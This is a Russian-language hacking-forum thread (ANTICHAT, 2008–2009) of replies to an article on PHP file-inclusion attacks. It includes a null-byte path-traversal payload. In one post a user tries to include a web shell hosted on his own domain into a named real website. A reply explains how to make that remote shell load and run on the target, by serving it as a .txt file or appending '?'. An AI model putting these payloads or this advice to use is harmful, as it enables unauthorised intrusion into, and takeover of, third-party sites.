HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.11.2008, 17:11
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию

чтобы обойти всю эту иньекцию достаточно выключить register_globals
 

  #2  
Старый 10.11.2008, 17:13
bombeg
Участник форума
Регистрация: 27.10.2008
Сообщений: 244
Провел на форуме:
963613

Репутация: 428
По умолчанию

чтобы не париться на счет инъекций, можно убить себя.
 

  #3  
Старый 10.11.2008, 17:26
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию

а чтобы инклудиться на другие сайты, параметр include_path должен быть включён (php.ini), а он отключён по стандарту, как и register_globals

`````````````````
Статья старая, но раньше она была актуальна, bombeg, не надо поднимать переполох

Последний раз редактировалось Ru}{eeZ; 10.11.2008 в 17:32..
 

  #4  
Старый 10.11.2008, 20:07
winterfrost
Познающий
Регистрация: 18.08.2008
Сообщений: 45
Провел на форуме:
418790

Репутация: 64
По умолчанию

Цитата:
Можно попробывать с нулевым байтов (%00) - это сделает возможным просмотреть файлы с разрешением отличным от .htm,(пример index.php?page=../index.php%00) но… такое уже редко встречается.
Насколько мне известно, файлы с расширением .php посмотреть всёравно не получиться, потому-что "The include() statement includes and evaluates the specified file. " (http://ua.php.net/include/).

p.s. чёрт, только щас заметил, что статья 2005-го года =))))

Последний раз редактировалось winterfrost; 10.11.2008 в 20:13..
 

  #5  
Старый 12.11.2008, 00:27
den1skA
Познающий
Регистрация: 20.05.2008
Сообщений: 78
Провел на форуме:
555326

Репутация: 47
Отправить сообщение для den1skA с помощью ICQ
По умолчанию

Блин ещё бы кто написал статейку про sql injection вообще шикарно бы было!
 

  #6  
Старый 12.11.2008, 14:42
Solide Snake
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

Цитата:
Сообщение от den1skA  
Блин ещё бы кто написал статейку про sql injection вообще шикарно бы было!
https://forum.antichat.ru/thread43966.html - SQL injection полный FAQ
https://forum.antichat.ru/thread35207.html - Новая альтернатива Benchmark'y или эффективный blind SQL-injection
 

  #7  
Старый 12.11.2008, 15:06
den1skA
Познающий
Регистрация: 20.05.2008
Сообщений: 78
Провел на форуме:
555326

Репутация: 47
Отправить сообщение для den1skA с помощью ICQ
По умолчанию

Цитата:
Сообщение от Solide Snake  
https://forum.antichat.ru/thread43966.html - SQL injection полный FAQ
https://forum.antichat.ru/thread35207.html - Новая альтернатива Benchmark'y или эффективный blind SQL-injection
ммм... спасибо
 

  #8  
Старый 20.02.2009, 23:13
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию

А что делать если стоит фильтрация на \ : . - вообщем на "плохие" символы?
 

Plizzz help
  #9  
Старый 13.10.2009, 10:58
N@b$ter
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901

Репутация: 0
Отправить сообщение для N@b$ter с помощью ICQ
Question Plizzz help

Такая фигня, http://www.prodisney.ru/index.php?page=http://nabstre.tu2.ru/shell.php но показывает дерикторию моего сайта а не этого что делать???
 

  #10  
Старый 16.10.2009, 10:22
Rezak
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
9419

Репутация: 2
По умолчанию

Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
Либо вообще без расширения, то есть так:

index.php?page=http://nabstre.tu2.ru/shell.txt?

Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.


Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
Так что облом.

Последний раз редактировалось Rezak; 16.10.2009 в 10:27..
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ